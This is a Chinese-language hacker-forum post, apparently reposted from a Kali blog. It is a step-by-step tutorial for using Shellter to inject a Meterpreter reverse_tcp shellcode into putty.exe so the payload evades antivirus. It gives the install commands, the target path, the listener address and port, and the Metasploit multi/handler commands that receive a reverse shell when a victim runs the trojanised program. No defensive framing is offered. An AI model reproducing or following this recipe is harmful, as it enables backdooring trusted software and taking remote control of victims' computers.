跳转到帖子

游客您好,欢迎来到黑客世界论坛!您可以在这里进行注册。

赤队小组-代号1949(原CHT攻防小组)在这个瞬息万变的网络时代,我们保持初心,创造最好的社区来共同交流网络技术。您可以在论坛获取黑客攻防技巧与知识,您也可以加入我们的Telegram交流群 共同实时探讨交流。论坛禁止各种广告,请注册用户查看我们的使用与隐私策略,谢谢您的配合。小组成员可以获取论坛隐藏内容!

TheHackerWorld官方

Shellter-A Shellcode 注入工具

精选回复

发布于
Shellter 是一个 shellcode 注入工具。它有效地重新编码有效负载(此处为外壳代码)以绕过防病毒(AV)软件。Shellter已被证明是Windows 32位应用程序的PE(可移植可执行文件)文件格式的第一个动态感染者。要使用Shellter,您可以创建自己的shellcode,也可以从Metasploit等框架中创建一个shellcode。Shellter 嵌入了一个 32 位 Windows 应用程序和 shellcode。

安装

在kali Linux中我们可以利用下面命令直接安装

apt-get install shellter

3368618381.png
接下来,我们需要安装wine32环境。

apt-get intall wine32

运行Shellter

在终端执行命令Shellter
Shellter时,它会提示您选择操作模式。
104827dgzhkgkiv6uu67gh.png
选择模式为a

现在,您需要选择一个可执行文件并将其复制到Shellter文件夹。要将 Shellter 与.exe文件绑定,需要执行此操作。在这里我们以putty.exe为列。
3136329972.png
当系统要求您输入 PE 目标时,请键入以下命令:

/root/Downloads/putty.exe

在经过一番复杂的编码加密注入后,下面要求我们选择一种 payload 或 自定义使用 payload ,这里我选择 L 并选择列表中的 1
104955kp2p127q74z12ctz.png

set LHOST :192.168.15.135
set LPORT :4444

当我们回车后,shellter 就会自动帮我们生成 shellcode 并自动退出程序。我们在当前目录下 使用 ls -l 命令进行查看,可以看到 putty.exe 已被成功注入:
接着我们在 kali 上启动 MSF,配置反弹会话的 handler :

use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.15.135
set port 4444
exploit

此时只要当目标成功运行,经我们注入的 shellcode 程序,我们就能取得目标的 shell !
105126u36wvad9w2dyg0v3.png


版权属于:逍遥子大表哥

本文链接:https://blog.bbskali.cn/3412.html

按照知识共享署名-非商业性使用 4.0 国际协议进行许可,转载引用文章应遵循相同协议。

创建帐户或登录后发表意见

最近浏览 0

  • 没有会员查看此页面。